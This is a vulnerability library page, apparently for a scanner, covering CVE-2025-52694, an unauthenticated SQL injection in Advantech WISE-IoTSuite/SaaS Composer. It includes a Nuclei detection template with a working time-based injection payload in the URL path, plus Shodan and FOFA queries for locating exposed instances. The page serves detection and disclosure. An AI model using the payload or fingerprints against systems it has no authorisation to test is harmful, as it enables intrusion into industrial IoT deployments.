/Vulnerability Library

Advantech WISE-IoTSuite/SaaS - SQL Injection

CVE-2025-52694
Verified

Description

Advantech WISE-IoTSuite/SaaS Composer suffers from an unauthenticated SQL Injection vulnerability due to the unsafe use of the `filename` parameter within the URL path in PostgreSQL queries. Remote attackers can exploit this flaw by injecting SQL code (such as the use of `pg_sleep` for time delays) to verify the vulnerability, and may gain further impact such as Remote Code Execution (RCE) depending on the privileges granted to the database user.

Severity

Critical

CVSS Score

10

Exploit Probability

14%

Published Date

January 12, 2026

Template Author

loi nguyen thang

CVE-2025-52694.yaml
id: CVE-2025-52694

info:
  name: Advantech WISE-IoTSuite/SaaS - SQL Injection
  author: Loi Nguyen Thang
  severity: critical
  description: |
    Advantech WISE-IoTSuite/SaaS Composer suffers from an unauthenticated SQL Injection vulnerability due to the unsafe use of the `filename` parameter within the URL path in PostgreSQL queries. Remote attackers can exploit this flaw by injecting SQL code (such as the use of `pg_sleep` for time delays) to verify the vulnerability, and may gain further impact such as Remote Code Execution (RCE) depending on the privileges granted to the database user.
  impact: |
    Successful exploitation could allow an attacker to dump the database, modify data, or execute remote commands on the underlying server.
  remediation: |
    Apply the latest security patches provided by Advantech or sanitize the `filename` input parameter to prevent SQL injection.
  reference:
    - https://www.cve.org/CVERecord?id=CVE-2025-52694
    - https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001
    - https://github.com/Winz18/CVE-2025-52694-POC
    - https://nvd.nist.gov/vuln/detail/CVE-2025-52694
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-52694
    epss-score: 0.13796
    epss-percentile: 0.9426
    cwe-id: CWE-89
  metadata:
    verified: true
    shodan-query: title:"SaaS Composer"
    fofa-query: title="SaaS Composer"
  tags: cve,cve2025,sqli,advantech,iot,saas-composer,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        words:
          - "SaaS Composer"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/displays/nuclei_check.json'; select pg_sleep(6) --?org_id={{org_id}}"

    payloads:
      org_id:
        - 1
        - 2
        - 3
        - 4
        - 5

    attack: clusterbomb
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'duration>=6'
        condition: and
# digest: 490a00463044022023fe51dcf65e691e724967c0bf8d16ccb0c1d542fa2031830ac7db6fc7fa64ef0220674513383ef47bd21a898cc71ed76b30d47a23c3c723bdb1e8b83311bd06f2d9:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-52694
CWE ID:
cwe-89

References

https://www.cve.org/CVERecord?id=CVE-2025-52694https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001https://github.com/Winz18/CVE-2025-52694-POChttps://nvd.nist.gov/vuln/detail/CVE-2025-52694

Remediation Steps

Apply the latest security patches provided by Advantech or sanitize the `filename` input parameter to prevent SQL injection.